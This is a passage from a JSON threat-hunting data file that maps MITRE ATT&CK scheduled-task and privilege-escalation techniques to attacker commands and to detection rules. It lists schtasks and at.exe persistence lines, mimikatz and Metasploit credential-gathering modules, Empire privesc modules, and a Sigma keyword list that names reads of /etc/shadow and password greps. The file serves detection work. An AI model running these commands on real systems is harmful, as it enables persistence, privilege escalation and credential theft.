[ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1053", + "command_list": [ + "schtasks [/s HOSTNAME]", + "shell schtasks", + "Creating a scheduled task:\nschtasks [/S HOSTNAME] /create /tn \"acachesrv\" /tr C:\\file\\path\\here.exe /sc ONLOGON /ru \"System\" [/rp password]\nRequirements for running scheduled tasks:\nnet start schedule\nsc config schedule start= auto", + "Creating a scheduled task:\nshell schtasks [/S HOSTNAME] /create /tn \"acachesrv\" /tr C:\\file\\path\\here.exe /sc ONLOGON /ru \"System\" [/rp password]\nRequirements for running scheduled tasks:\nshell net start schedule\nshell sc config schedule start= auto", + "schtask.exe /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10", + "schtask.exe /create /tn \"mysc\" /tr C:\\windows\\system32\\cmd.exe /sc ONLOGON /ru \"System\"", + "at.exe ##:## /interactive cmd", + "at.exe \\\\[computername|IP] ##:## c:\\temp\\evil.bat", + "net.exe use \\\\[computername|IP] /user:DOMAIN\\username password", + "net.exe time \\\\[computername|IP]", + "schtasks.exe /create * appdata", + "\\\\Windows\\\\.+\\\\at.exe", + "\\\\Windows\\\\.+\\\\schtasks.exe/Create", + "powershell/lateral_movement/new_gpo_immediate_task", + "powershell/persistence/elevated/schtasks", + "powershell/persistence/userland/schtasks" + ], + "commands": [ + { + "command": "schtasks [/s HOSTNAME]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell schtasks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "Creating a scheduled task:\nschtasks [/S HOSTNAME] /create /tn \"acachesrv\" /tr C:\\file\\path\\here.exe /sc ONLOGON /ru \"System\" [/rp password]\nRequirements for running scheduled tasks:\nnet start schedule\nsc config 
schedule start= auto", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Creating a scheduled task:\nshell schtasks [/S HOSTNAME] /create /tn \"acachesrv\" /tr C:\\file\\path\\here.exe /sc ONLOGON /ru \"System\" [/rp password]\nRequirements for running scheduled tasks:\nshell net start schedule\nshell sc config schedule start= auto", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "schtask.exe /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "schtask.exe /create /tn \"mysc\" /tr C:\\windows\\system32\\cmd.exe /sc ONLOGON /ru \"System\"", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "at.exe ##:## /interactive cmd", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "at.exe \\\\[computername|IP] ##:## c:\\temp\\evil.bat", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "net.exe use \\\\[computername|IP] /user:DOMAIN\\username password", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "net.exe time \\\\[computername|IP]", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "schtasks.exe /create * appdata", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "\\\\Windows\\\\.+\\\\at.exe", + "source": "SysmonHunter - Scheduled Task", + "name": "" + }, + { + "command": "\\\\Windows\\\\.+\\\\schtasks.exe/Create", + "source": "SysmonHunter - Scheduled Task", + "name": "" + }, + { + "command": "powershell/lateral_movement/new_gpo_immediate_task", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/elevated/schtasks", + "source": 
"https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/userland/schtasks", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1053", + "Built-in Windows Command": "schtasks [/s HOSTNAME]", + "Cobalt Strike": "shell schtasks", + "Metasploit": "", + "Description": "Displays all of the currently scheduled tasks to be run on a computer" + }, + { + "Category": "T1053", + "Built-in Windows Command": "Creating a scheduled task:\nschtasks [/S HOSTNAME] /create /tn \"acachesrv\" /tr C:\\file\\path\\here.exe /sc ONLOGON /ru \"System\" [/rp password]\nRequirements for running scheduled tasks:\nnet start schedule\nsc config schedule start= auto", + "Cobalt Strike": "Creating a scheduled task:\nshell schtasks [/S HOSTNAME] /create /tn \"acachesrv\" /tr C:\\file\\path\\here.exe /sc ONLOGON /ru \"System\" [/rp password]\nRequirements for running scheduled tasks:\nshell net start schedule\nshell sc config schedule start= auto", + "Metasploit": "", + "Description": "Add scheduled task (/s is name/ip of remote system to do this on; /tn is the name of the task; /sc is when to run; /ru is user to runas; /rp is password for that user)\nmay need to make sure that the schedule service is started and configured to run on boot so that your persistence sticks.\nDelete a scheduled task by name:\nschtasks [/s HOSTNAME] /delete /tn \"name\"" + }, + { + "chain_id": "100184", + "os": "windows", + "parent_process": "schtask.exe", + "commandline_string": "/Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "scheduled_task", + "mitre_attack": 
"T1053", + "itw_sample": "" + }, + { + "chain_id": "100185", + "os": "windows", + "parent_process": "schtask.exe", + "commandline_string": "/create /tn \"mysc\" /tr C:\\windows\\system32\\cmd.exe /sc ONLOGON /ru \"System\"", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "scheduled_task", + "mitre_attack": "T1053", + "itw_sample": "" + }, + { + "chain_id": "100186", + "os": "windows", + "parent_process": "at.exe", + "commandline_string": "##:## /interactive cmd", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "scheduled_task", + "mitre_attack": "T1053", + "itw_sample": "" + }, + { + "chain_id": "100187", + "os": "windows", + "parent_process": "at.exe", + "commandline_string": "\\\\[computername|IP] ##:## c:\\temp\\evil.bat", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "scheduled_task", + "mitre_attack": "T1053", + "itw_sample": "" + }, + { + "chain_id": "100188", + "os": "windows", + "parent_process": "net.exe", + "commandline_string": "use \\\\[computername|IP] /user:DOMAIN\\username password", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "scheduled_task", + "mitre_attack": "T1053", + "itw_sample": "" + }, + { + "chain_id": "100189", + "os": "windows", + "parent_process": "net.exe", + "commandline_string": "time \\\\[computername|IP]", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": 
"", + "frequency": "low", + "mitre_caption": "scheduled_task", + "mitre_attack": "T1053", + "itw_sample": "" + }, + { + "chain_id": "100206", + "os": "windows", + "parent_process": "schtasks.exe", + "commandline_string": "/create * appdata", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "", + "mitre_attack": "T1053", + "itw_sample": "fe66f4fec21229bd008d7974f071fae1a1a2ef7a1365cee27675f197719a8e27" + }, + { + "name": "Scheduled Task", + "description": null, + "level": "high", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\at.exe", + "flag": "regex" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\schtasks.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "/Create" + } + } + } + ] + }, + { + "Empire Module": "powershell/lateral_movement/new_gpo_immediate_task", + "ATT&CK Technique #1": "T1053", + "ATT&CK Technique #2": "", + "Technique": "Scheduled Task", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/new_gpo_immediate_task\": [\"T1053\"]," + }, + { + "Empire Module": "powershell/persistence/elevated/schtasks", + "ATT&CK Technique #1": "T1053", + "ATT&CK Technique #2": "", + "Technique": "Scheduled Task", + "Concatenate for Python Dictionary": "\"powershell/persistence/elevated/schtasks\": [\"T1053\"]," + }, + { + "Empire Module": "powershell/persistence/userland/schtasks", + "ATT&CK Technique #1": "T1053", + "ATT&CK Technique #2": "", + "Technique": "Scheduled Task", + "Concatenate for Python Dictionary": "\"powershell/persistence/userland/schtasks\": [\"T1053\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 11 and process_command_line contains \"C:\\\\WINDOWS\\\\system32\\\\svchost.exe\"or file_name contains 
\"C:\\\\Windows\\\\System32\\\\Tasks\\\\\"or file_name contains \"C:\\\\Windows\\\\Tasks\\\\\"", + "name": "Scheduled Task FileAccess" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"taskeng.exe\"or process_path contains \"schtasks.exe\"or (process_path contains \"svchost.exe\"and process_parent_command_line != \"C:\\\\Windows\\\\System32\\\\services.exe\"))", + "name": "Scheduled Task Process" + } + ], + "possible_detections": [ + { + "action": "global", + "title": "Defrag Deactivation", + "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "author": "Florian Roth", + "description": "Detects the deactivation of the Scheduled defragmentation task as seen by Slingshot APT group", + "references": [ + "https://securelist.com/apt-slingshot/84312/" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.s0111" + ], + "detection": { + "condition": "1 of them" + }, + "falsepositives": [ + "Unknown" + ], + "level": "medium" + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": [ + "*schtasks* /delete *Defrag\\ScheduledDefrag*" + ] + } + } + }, + { + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: Audit Policy : Audit Other Object Access Events > Success" + }, + "detection": { + "selection2": { + "EventID": 4701, + "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag" + } + } + }, + { + "title": "Persistence and Execution at scale via GPO scheduled task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "description": "Detect lateral movement using GPO scheduled task, ususally used to deploy ransomware at scale", + "author": "Samir Bousseaden", + "references": [ + "https://twitter.com/menasec1/status/1106899890377052160" + ], + "tags": [ + "attack.persistence", + "attack.lateral_movement", + "attack.t1053" + ], + "logsource": { + "product": "windows", + "service": 
"security", + "description": "The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure" + }, + "detection": { + "selection": { + "EventID": 5145, + "ShareName": "\\\\*\\SYSVOL", + "RelativeTargetName": "*ScheduledTasks.xml", + "Accesses": "*WriteData*" + }, + "condition": "selection" + }, + "falsepositives": [ + "if the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + ], + "level": "high" + }, + { + "title": "Remote Task Creation via ATSVC named pipe", + "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "author": "Samir Bousseaden", + "references": [ + "https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "attack.t1053", + "car.2013-05-004", + "car.2015-04-001" + ], + "logsource": { + "product": "windows", + "service": "security", + "description": "The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure" + }, + "detection": { + "selection": { + "EventID": 5145, + "ShareName": "\\\\*\\IPC$", + "RelativeTargetName": "atsvc", + "Accesses": "*WriteData*" + }, + "condition": "selection" + }, + "falsepositives": [ + "pentesting" + ], + "level": "medium" + }, + { + "title": "Rare Scheduled Task Creations", + "id": "b20f6158-9438-41be-83da-a5a16ac90c2b", + "status": "experimental", + "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. 
The aggregation and count function selects tasks with rare names.", + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.s0111" + ], + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "taskscheduler" + }, + "detection": { + "selection": { + "EventID": 106 + }, + "timeframe": "7d", + "condition": "selection | count() by TaskName < 5" + }, + "falsepositives": [ + "Software installation" + ], + "level": "low" + }, + { + "title": "Rare Schtasks Creations", + "id": "b0d77106-7bb0-41fe-bd94-d1752164d066", + "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", + "status": "experimental", + "author": "Florian Roth", + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053", + "car.2013-08-001" + ], + "logsource": { + "product": "windows", + "service": "security", + "definition": "The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection (not in the baseline recommendations by Microsoft). We also recommend extracting the Command field from the embedded XML in the event data." 
+ }, + "detection": { + "selection": { + "EventID": 4698 + }, + "timeframe": "7d", + "condition": "selection | count() by TaskName < 5" + }, + "falsepositives": [ + "Software installation", + "Software updates" + ], + "level": "low" + }, + { + "title": "Scheduled Task Creation", + "id": "92626ddd-662c-49e3-ac59-f6535f12d189", + "status": "experimental", + "description": "Detects the creation of scheduled tasks in user session", + "author": "Florian Roth", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\schtasks.exe", + "CommandLine": "* /create *" + }, + "filter": { + "User": "NT AUTHORITY\\SYSTEM" + }, + "condition": "selection and not filter" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053", + "attack.s0111", + "car.2013-08-001" + ], + "falsepositives": [ + "Administrative activity", + "Software installation" + ], + "level": "low" + }, + { + "title": "Windows 10 scheduled task SandboxEscaper 0-day", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "status": "experimental", + "description": "Detects Task Scheduler .job import arbitrary DACL write\\par", + "references": [ + "https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe" + ], + "author": "Olaf Hartong", + "date": "2019/05/22", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "schtasks.exe", + "CommandLine": "*/change*/TN*/RU*/RP*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "tags": [ + "attack.privilege_escalation", + "attack.execution", + "attack.t1053", + "car.2013-08-001" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Windows event logs" + ], + [ + "4688 ", + "Process CMD Line" 
+ ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "106", + "Task Registered" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container creation", + "description": "A container was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "container" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + 
"data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances 
of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/", + "http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "http://blog.morphisec.com/fin7-attacks-restaurant-industry", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.group-ib.com/blog/cobalt", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + 
"https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + "https://github.com/PowerShellEmpire/Empire", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "Priv Esc:", + "command_list": [], + "commands": [], + "parsed_datasets": [ + { + "Category": "Priv Esc:", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "", + "command_list": [ + "mimikatz token::elevate\nor\nelevate", + 
"post/windows/gather/credentials/gpp\npost/windows/gather/credentials/outlook\npost/windows/gather/credentials/enum_cred_store\npost/windows/gather/enum_unattend" + ], + "commands": [ + { + "command": "mimikatz token::elevate\nor\nelevate", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/gather/credentials/gpp\npost/windows/gather/credentials/outlook\npost/windows/gather/credentials/enum_cred_store\npost/windows/gather/enum_unattend", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + } + ], + "parsed_datasets": [ + { + "Category": "", + "Built-in Windows Command": "", + "Cobalt Strike": "mimikatz token::elevate\nor\nelevate", + "Metasploit": "", + "Description": "If you already have a high integrity administrative process, this technique will get you SYSTEM. This is useful to bypass certain logging." + }, + { + "Category": "", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "post/windows/gather/credentials/gpp\npost/windows/gather/credentials/outlook\npost/windows/gather/credentials/enum_cred_store\npost/windows/gather/enum_unattend", + "Description": "These modules look for common places where passwords are stored either in plaintext or where the encryption keys are widely published for easy decryption." 
+ }, + { + "Category": "", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "" + }, + { + "Category": "", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1068", + "command_list": [ + "getsystem", + "bitsadmin.exe", + "msbuild.exe *MSBuildShell.csproj", + "powershell/privesc/ms16-032", + "powershell/privesc/tater", + "powershell/privesc/ms16-135" + ], + "commands": [ + { + "command": "getsystem", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "getsystem", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "bitsadmin.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "msbuild.exe *MSBuildShell.csproj", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell/privesc/ms16-032", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/tater", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/ms16-135", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1068", + "Built-in Windows Command": "", + "Cobalt Strike": "getsystem", + "Metasploit": "getsystem", + "Description": "This technique tries a series of exploits to elevate to a SYSTEM level process (these are actual exploits, not trust abuses, so there's always the potential for bluescreening)" + }, + { + "chain_id": 
"100013", + "os": "windows", + "parent_process": "bitsadmin.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "file_transfer", + "mitre_attack": "T1068", + "itw_sample": "https://www.joesecurity.org/reports/report-1144eeaebb15044fa64f4d9bb5670349.html#startup" + }, + { + "chain_id": "100041", + "os": "windows", + "parent_process": "msbuild.exe", + "commandline_string": "*MSBuildShell.csproj", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "vulnerability_exploit", + "mitre_attack": "T1068", + "itw_sample": "https://github.com/Cn33liz/MSBuildShell/blob/master/MSBuildShell.csproj" + }, + { + "Empire Module": "powershell/privesc/ms16-032", + "ATT&CK Technique #1": "T1068", + "ATT&CK Technique #2": "", + "Technique": "Exploitation for Privilege Escalation", + "Concatenate for Python Dictionary": "\"powershell/privesc/ms16-032\": [\"T1068\"]," + }, + { + "Empire Module": "powershell/privesc/tater", + "ATT&CK Technique #1": "T1068", + "ATT&CK Technique #2": "", + "Technique": "Exploitation for Privilege Escalation", + "Concatenate for Python Dictionary": "\"powershell/privesc/tater\": [\"T1068\"]," + }, + { + "Empire Module": "powershell/privesc/ms16-135", + "ATT&CK Technique #1": "T1068", + "ATT&CK Technique #2": "", + "Technique": "Exploitation for Privilege Escalation", + "Concatenate for Python Dictionary": "\"powershell/privesc/ms16-135\": [\"T1068\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Hurricane Panda Activity", + "id": "0eb2107b-a596-422e-b123-b389d5594ed7", + "author": "Florian Roth", + "status": "experimental", + "description": "Detects Hurricane Panda Activity", + "references": [ + 
"https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/" + ], + "tags": [ + "attack.privilege_escalation", + "attack.g0009", + "attack.t1068" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "* localgroup administrators admin /add", + "*\\Win64.exe*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Privilege Escalation Preparation", + "id": "444ade84-c362-4260-b1f3-e45e20e1a905", + "status": "experimental", + "description": "Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.", + "references": [ + "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", + "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/" + ], + "author": "Patrick Bareiss", + "date": "2019/04/05", + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "level": "medium", + "logsource": { + "product": "linux" + }, + "detection": { + "keywords": [ + "cat /etc/issue", + "cat /etc/*-release", + "cat /proc/version", + "uname -a", + "uname -mrs", + "rpm -q kernel", + "dmesg | grep Linux", + "ls /boot | grep vmlinuz-", + "cat /etc/profile", + "cat /etc/bashrc", + "cat ~/.bash_profile", + "cat ~/.bashrc", + "cat ~/.bash_logout", + "ps -aux | grep root", + "ps -ef | grep root", + "crontab -l", + "cat /etc/cron*", + "cat /etc/cron.allow", + "cat /etc/cron.deny", + "cat /etc/crontab", + "grep -i user *", + "grep -i pass *", + "ifconfig", + "cat /etc/network/interfaces", + "cat /etc/sysconfig/network", + "cat /etc/resolv.conf", + "cat /etc/networks", + "iptables -L", + "lsof -i", + "netstat -antup", + "netstat -antpx", + "netstat -tulpn", + "arp -e", + "route", + "cat /etc/passwd", + "cat /etc/group", + "cat /etc/shadow", + "find / -perm 
